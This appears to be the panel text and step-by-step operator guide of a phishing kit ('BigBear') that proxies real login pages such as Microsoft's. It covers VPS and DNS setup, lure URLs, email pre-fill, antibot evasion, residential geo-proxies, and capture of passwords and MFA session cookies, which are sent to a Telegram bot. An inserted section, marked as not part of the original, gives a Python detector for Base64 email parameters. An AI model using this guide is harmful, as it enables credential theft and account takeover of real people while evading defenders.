VPS Management
Manage your VPS servers and installations
| Name | IP Address | Domain | Status | Actions |
|---|---|---|---|---|
DNS Challenges & SSL
Generate ACME DNS challenges and SSL certificates
Active Installations
View all active installations with web panel access
Credentials
Permanently stored captures from all your VPS instances
| Password | Stage | Country | Browser | VPS | Keepalive | Captured | Actions |
|---|---|---|---|---|---|---|---|
Admin Panel
Manage users and view all VPS
User Management
| ID | Username | Role | Status | Created | Actions |
|---|---|---|---|---|---|
All VPS (All Users)
| ID | Name | IP | Domain | Status | User | Actions |
|---|---|---|---|---|---|---|
BigBear Control
Start, stop, restart, and monitor BigBear instances
Control Actions
BigBear Logs
Configuration
Manage BigBear configuration settings
Quick Guide
- Domain: Root domain your server listens on
- External IPv4: Public IP of your VPS
- Unauthorized URL: Redirect for invalid lure visits
- Webhook Verbosity: 0=off, 1=final auth, 2=all
Phishlets
Manage your phishing templates
Quick Guide
- Enable: Activates the phishlet and generates SSL
- Disable: Stops the phishlet
- Hide/Unhide: Returns 404 unless valid Lure ID present
- Subdomain: The subdomain prefix for this phishlet (e.g. login → login.example.com)
- Redirect URL: Where blocked/unauthorized visitors are sent
| Name | Status | Domain | Subdomain | Redirect URL | Actions |
|---|---|---|---|---|---|
Lures
Manage your phishing lures
How Lures Work
- Lure URL: The entry point you share with targets. Antibot checks run here first.
- Domain URL: Base domain. Antibot active — no session created without lure path.
- Success Redirect: Where victim goes after authentication completes (leave blank for real site).
- Bot Redirect: Where blocked visitors (bots/scanners) are sent.
| ID | Phishlet | Lure URL | Success Redirect | Bot Redirect | Status | Actions |
|---|---|---|---|---|---|---|
Proxy Configuration
Geo-adaptive proxy routing for upstream connections
How Proxy Pool Works
- Geo-Matching: Visitor country is detected via IP intel. If a proxy with a matching country exists, it is used automatically.
- Fallback: If no country match, the first available enabled proxy is used.
- Sync: Click "Sync Pool to VPS" to push your proxy pool from this panel to the VPS config.
Proxy Pool (0 proxies)
| Name | Country | Address | Port | Type | Enabled |
|---|---|---|---|---|---|
Legacy Single Proxy (optional fallback)
Blacklist
Manage automatic IP blacklisting
Blacklist Modes
- Off: Ignore blacklist
- Unauth: Block only unauthorized requests
- All: Block all requests from blacklisted IPs
- NoAdd: Block existing, don't add new IPs
Engine Logs
Live log stream from the BigBear engine on the target VPS
Help & Guide
Step-by-step instructions for every feature
Quick Start (5 Steps)
Get a phishing page live in under 10 minutes:
- Buy a domain (e.g. example.com) and a fresh Ubuntu VPS.
- Point DNS — Add two A records at your registrar:
  A example.com → VPS_IP
  A *.example.com → VPS_IP
- Add VPS in this panel — Enter the IP, SSH credentials, domain, and Telegram webhook.
- Click Install — The panel uploads the engine, configures everything, obtains SSL certificates automatically, and starts the engine.
- Create a Lure — Go to Lures, create one with path /meetings. Your lure URL is ready to send.
VPS Management
This is your starting point. Add your target VPS servers here, and the panel will connect to them over SSH to manage everything remotely.
Adding a VPS
- Click + Add VPS and fill in the Name, IP, SSH port (usually 22), username (root), and password.
- Set the Domain you will use (e.g. example.com). DNS must already point to the VPS IP.
- BigBear Path is where the engine gets installed (default: /root/bigbear).
- Telegram Webhook sends real-time alerts. Format: BOT_TOKEN/CHAT_ID (see Telegram section below).
VPS Actions
- Install: Runs the full automated setup on a fresh VPS (uploads engine, configures firewall, obtains SSL, starts service).
- Edit: Update IP, credentials, domain, or Telegram webhook.
- Delete: Removes the VPS from the panel. Does not touch the remote server.
Installation Process
When you click Install on a VPS, the panel runs a fully automated setup:
- Upload — Transfers bigbear2.zip to the VPS containing the engine binary, phishlets, and proxy.json.
- Extract — Unpacks the engine files to the BigBear path.
- Firewall — Opens ports 443, 80, 53, and 7654. Frees port 53 from systemd-resolved.
- Configuration — Writes config.json with your domain, IP, and Telegram settings.
- Systemd Service — Creates and enables bigbear-engine.service for automatic startup.
- Start Engine — Launches the engine. SSL certificates are obtained automatically via Let's Encrypt.
DNS Setup
Before installing BigBear on a VPS, you must configure DNS at your domain registrar.
Required DNS Records
Add these two A records at your registrar (e.g. Namecheap, Cloudflare, GoDaddy):
| Type | Name | Value |
|---|---|---|
| A | @ | Your VPS IP |
| A | * | Your VPS IP |
The wildcard record (*) is essential. The engine uses multiple subdomains (management, cdn, login, device, etc.) and they all must resolve to your VPS IP. Wait for DNS propagation (usually 5-30 minutes) before installing.
BigBear Control
Start, stop, restart, and monitor BigBear engine instances on your VPS servers.
- Start: Starts the BigBear engine via systemd. The engine binds to ports 443, 80, 53, and 7654.
- Stop: Stops the engine cleanly and releases all ports.
- Restart: Stops, waits for ports to release, then starts again. Use this after configuration changes.
- Logs: View real-time engine logs (visitors, credentials, antibot decisions, proxy routing).
Configuration
Edit the engine configuration on the selected VPS. Changes are saved to config.json and hot-reloaded automatically.
- Domain: The base domain for your phishing setup (e.g. example.com). Cannot be changed after installation without reinstalling.
- External IP: Your VPS's public IP. Must match your DNS A records exactly.
- Redirect URL: Where blocked visitors (bots, VPNs, datacenter IPs) get redirected. Default: https://www.google.com
- IPAPI Key: API key from ipapi.is for IP intelligence (antibot checks). Required for the antibot to work.
- Telegram: Bot token and chat ID for real-time notifications.
Phishlets
Phishlets are YAML files that define how the engine impersonates a target website. They control domain mapping, URL rewriting, JavaScript injection, cookie capture, and credential interception.
Key Fields
- Subdomain: The landing subdomain (the one with is_landing: true). This is used in your lure URLs. You can change it from this panel.
- Domain: Auto-filled from your VPS configuration.
- Enabled/Disabled: Toggle the phishlet on or off.
phish_sub. Other proxy hosts (cdn, device, login, etc.) keep their original subdomains. After changing, restart the engine for the new subdomain to take effect.
Lures
Lures are the phishing URLs you send to targets. Each lure has a custom path and is tied to a phishlet.
How Lures Work
- Create a lure and set a path (e.g. /meetings).
- Your lure URL becomes: https://management.example.com/meetings
- When a visitor opens this URL, the engine runs the antibot check (ipapi.is).
- If the visitor passes (residential IP), the engine creates a session, whitelists their IP, and redirects them to the login page.
- If blocked (datacenter/VPN/proxy IP), the visitor is redirected to the redirect URL (default: google.com).
Lure Fields
| Field | Description |
|---|---|
| Path | Custom URL path. Use something that looks legitimate (e.g. /meetings, /document/view, /portal). |
| OG Title / Desc / Image | Open Graph tags for link previews when shared on social media or messaging apps. |
| UA Filter | Regex to only allow specific user agents (leave empty to allow all). |
| Paused | Temporarily disables the lure without deleting it. |
Autolink (Email Pre-fill)
Skip the email entry page by embedding the target's email directly in the lure URL.
How to Use
- Take your target's email (e.g. john@company.com).
- Encode it in Base64: am9obkBjb21wYW55LmNvbQ (use any Base64 encoder).
- Append ?handler=am9obkBjb21wYW55LmNvbQ to your lure URL.
https://management.example.com/meetings?handler=am9obkBjb21wYW55LmNvbQ
The target will land directly on the password page with their email already filled in. This makes the phishing flow faster and more convincing.
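For defenders: the handler parameter described above puts the recipient's address, Base64-encoded, into the URL itself, where a mail gateway or web proxy can decode it. The following is an added detection example, not part of the original page or of the kit. It flags any query parameter (not only handler) whose value decodes to an e-mail address in a watched domain. The function names, sample URLs and watched domain are assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
B64_CHARS = re.compile(r"[A-Za-z0-9+/_-]+")


def decode_b64_email(value):
    """Return the address if value is Base64 (padded or not, standard or
    URL-safe alphabet) of a single e-mail address, else None."""
    body = value.replace(" ", "+").rstrip("=")  # parse_qsl turns '+' into ' '
    if len(body) < 8 or len(body) % 4 == 1 or not B64_CHARS.fullmatch(body):
        return None
    body = body.replace("-", "+").replace("_", "/") + "=" * (-len(body) % 4)
    try:
        text = base64.b64decode(body, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if EMAIL_RE.fullmatch(text) else None


def find_prefilled_emails(url):
    """Return [(parameter, address)] for each query value that decodes to an e-mail."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [(k, e) for k, v in pairs if (e := decode_b64_email(v))]


def flag_urls(urls, watched_domains):
    """Return (url, parameter, address) for hits whose address is in a watched domain."""
    watched = {d.lower() for d in watched_domains}
    return [(u, k, e) for u in urls for k, e in find_prefilled_emails(u)
            if e.rsplit("@", 1)[1].lower() in watched]


# Constructed sample URLs, as they might appear in a mail-gateway or web-proxy log.
SAMPLE_URLS = [
    "https://management.example.com/meetings?handler=am9obkBjb21wYW55LmNvbQ",
    "https://login.example.net/portal?id=7&u=am9obkBjb21wYW55LmNvbQ%3D%3D",
    "https://shop.example.org/search?q=base64encoder&page=2",
]

if __name__ == "__main__":
    for hit in flag_urls(SAMPLE_URLS, ["company.com"]):
        print(hit)
```

A hit on an inbound link to a domain the organisation does not own is a strong triage signal, since the address in the URL identifies the intended recipient even before anyone clicks.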
Live Sessions
The Sessions section shows all active and completed phishing sessions in real-time.
Session Stages
| Stage | Description |
|---|---|
| Visitor | Target opened the lure URL and was redirected to the login page. |
| Email Entered | Target typed their email address. |
| Password Entered | Target submitted their password. May show retry count if they re-entered it. |
| MFA Pending | Waiting for the target to complete MFA (authenticator app, SMS code, etc.). |
| Complete | Full session captured: email, password, and all authentication cookies. The cookie.js file is sent to Telegram. |
Geo-Proxy Routing
The engine automatically routes all traffic to the target site (e.g. Microsoft) through residential proxies matching the visitor's country.
How It Works
- When a visitor arrives, the antibot detects their country via ipapi.is (e.g. "Austria").
- All requests from that visitor to the target site are routed through the AT (Austria) proxy from proxy.json.
- Microsoft sees traffic coming from a residential Austrian IP instead of your VPS datacenter IP.
Fallback Chain
- Exact country proxy — Matches the visitor's country code.
- UK (GB) proxy — If the country proxy fails or is unavailable.
- Direct VPS IP — Last resort if all proxies fail.
proxy.json. They are automatically deployed to every new VPS during installation.
Antibot & IP Intelligence
Every visitor hitting a lure URL is checked in real-time via ipapi.is before they can see the login page.
What Gets Checked
- IP Blacklist: IPs manually added to blacklist.txt are blocked immediately.
- Bot User Agents: Known bot/scanner user agents are blocked.
- IP Intelligence (ipapi.is): Every request is checked synchronously. Datacenter, VPN, and proxy IPs are blocked. Only residential IPs pass through.
What Happens When Blocked
Blocked visitors are redirected to the Redirect URL (configured in Configuration section, default: google.com). They never see the phishing page.
Telegram Notifications
Get real-time alerts when visitors arrive, enter credentials, or complete authentication.
Step 1: Create a Telegram Bot
- Open Telegram and search for @BotFather.
- Send the command /newbot.
- Choose a name for your bot (e.g. "My Alerts").
- Choose a username (e.g. myalerts_bot).
- BotFather will reply with your Bot Token. It looks like: 7842901234:AAF_abcdef123456789xyz
- Save this token.
Step 2: Get Your Chat ID
- Open Telegram and search for @userinfobot (or @getmyid_bot).
- Send /start to the bot.
- It will reply with your Chat ID (a number like 123456789).
For group chats: Add your bot to the group, send a message, then visit https://api.telegram.org/bot<TOKEN>/getUpdates and find the chat ID (it will be a negative number like -100xxxxxxxxxx).
Step 3: Enter in the Panel
When adding or editing a VPS, paste into the Telegram Webhook field using this format:
Example:
7842901234:AAF_abcdef123456789xyz/123456789
Notification Events
| Event | Details |
|---|---|
| New Visitor | IP, Country, ISP, User Agent, Phishlet |
| Credentials | Email, Password, IP, Country, ISP, User Agent, Phishlet |
| Session Complete | Email, Password, IP, Country, ISP, UA, Token count + cookie.js file attachment |
Troubleshooting
| Problem | Solution |
|---|---|
| Lure redirects to Google | The lure is not registered. Create one in the Lures section and restart the engine. |
| Port already in use | Stop the engine, wait 5 seconds, then start again. Use the Restart button. |
| SSL certificate error | Certificates are issued automatically. Wait 30 seconds after startup and try again. Check Engine Logs for errors. |
| Antibot blocks my IP | You are using a VPN or datacenter connection. Test from a residential internet connection (home WiFi, mobile data). |
| No Telegram notifications | Verify your bot token and chat ID. Make sure the webhook format is correct: BOT_TOKEN/CHAT_ID |
| Subdomain not loading | Check that your wildcard DNS record (*.example.com) points to the VPS IP. All subdomains must resolve. |
| 404 page after login | The phishlet's login URL may be misconfigured. Check Engine Logs for proxy errors. |
| Engine keeps restarting | Another process is holding the ports. Stop the engine, run pkill -9 bigbear-engine via SSH, wait 5 seconds, then start. |